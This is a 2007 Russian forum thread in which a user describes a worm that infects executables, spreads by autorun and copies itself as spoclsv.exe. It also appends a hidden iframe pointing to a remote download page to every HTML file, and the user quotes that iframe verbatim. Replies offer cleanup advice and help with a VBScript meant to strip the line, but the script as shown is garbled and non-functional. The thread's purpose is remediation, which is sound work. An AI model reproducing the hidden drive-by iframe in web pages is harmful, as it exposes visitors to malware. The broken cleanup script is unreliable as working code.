Вирь Win32:Agent-ITS

Discussion in 'Безопасность и Анонимность' started by Dimi4, 20 Aug 2007.

  1. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Вот попалса такой червяк.
    Поставил автозапуск себе [setup.exe] на все локальные диски....Заражает exe. Сидит в памяти..
    Я убил процес..потом del ето вирь..но не ето главное.
    А Ищо копируетс в %windir%/system32/drivers/spoclsv.exe
    Блин..но он заражает все html
    т.к все html у меня зараж.
    Он дописует в конце
    PHP:
    <iframe src="http://[COLOR=Red]ww[/COLOR].viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
    Что ето за ссылка?
    И есть прога которая находила все *.htm\*.html и удаляла етот кусок?
    ----------------------
    сенк всем заранее
     
  2. Zolden

    Zolden Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    232
    Likes Received:
    37
    Reputations:
    -2
    Если не ошибаюсь, это вирь с автозаливом, или что о в этом роде... Его можно на сайтах поцепить.. сталкивался с таким червем... Лечить его не охота, переустановлю винду.
     
  3. GROB_T

    GROB_T Elder - Старейшина

    Joined:
    3 Mar 2007
    Messages:
    134
    Likes Received:
    50
    Reputations:
    6
    2 Dimi4, проги скорее всего нету, можешь сам написать, найди исходник программы для поиска файлов, а вырезание строки сам допиши
     
    1 person likes this.
  4. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Стясняюсь спросить:
    На каком языке исходник искать а то я не очень-то кодер...
    А может можна там VBs, Js через ActiveX?
     
  5. Ni0x

    Ni0x Elder - Старейшина

    Joined:
    27 Aug 2006
    Messages:
    338
    Likes Received:
    157
    Reputations:
    37
    Порадовало. Под автозаливом понимается автоматический слив денег со счета холдера на счет владельца трояна. Наверное ты имел ввиду автораспространение, зупачу к примеру.
     
  6. GROB_T

    GROB_T Elder - Старейшина

    Joined:
    3 Mar 2007
    Messages:
    134
    Likes Received:
    50
    Reputations:
    6
    2 Dimi4, написать можно на чем угодно, если надо на vbs то на сайте wilderwind.narod.ru есть пример вируса на vbs, который сносит все незанятые другими приложениями файлы на диске, его вобщем нетрудно переделать под поиск html файлов и их лечение
     
  7. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    Пройдщись хорошенько обновленным антивирусом (нод32 советую) в SafeMode.
    AVZ - неплохо детектит "хитрые" вирусы. Вкупе с НОДом он попалит большинство поползновений виря.
    Порченных HTML вряд ли у тебя так уж и много, так что обойдись руками, так быстрее будет.
    Еще лучше - переустанови винду. Вирмейкеры люди хитрые, может ты только верхушку айсберга видешь=)
     
  8. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Нет-уш...много у меня...
    --------
    нода нет..есть аваст.
    2дня назад переустанавлевал
     
  9. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    PHP:
    Set FSO CreateObject("Scripting.FileSystemObject")
    Set wshshell createobject("WScript.Shell")
    '
    Set TheFolder = FSO.GetFolder("D:\")
    TheExtension  = ".html"
    TheExtension = UCase(TheExtension)
    '
    Sub WorkWithSubFolders(ByVal AFolderByVal TheExtension)
    On Error Resume Next
    Dim MoreFolders
    TempFolder
    Set  MoreFolders 
    AFolder.SubFolders
    For Each TempFolder In MoreFolders
    WorkWithSubFolders TempFolder
    TheExtension
    Next
    End Sub
    '
     Dim AFile, TheFiles
     On Error Resume Next
     Set TheFiles = AFolder.Files
     For Each AFile In TheFiles
     If UCase(FSO.GetExtensionName(AFile.Path)) = TheExtension Then
     '''
     
    dim oReg
     set oReg 
    = New RegExp
     oReg
    .Global - true
     oReg
    .IgnoreCase true
     oReg
    .Pattern " <iframe src="http://ww.viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe> "
     
    txt oReg.Replace(txt" ")
     
    end if
     
    Next
     End Sub
     
    '
     WorkWithSubFolders TheFolder, TheExtension
    Такой скрипт подойдет?
     
  10. GROB_T

    GROB_T Elder - Старейшина

    Joined:
    3 Mar 2007
    Messages:
    134
    Likes Received:
    50
    Reputations:
    6
    работать точно не будет из-за этой строки
    PHP:
    oReg.Pattern " <iframe src="http://ww.viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe> "
    надо каждую кавычку заменить на две:

    PHP:
    oReg.Pattern " <iframe src=""http://ww.viph.net/wuhan/down.htm"" width=""0"" height=""0"" frameborder=""0""> </iframe> "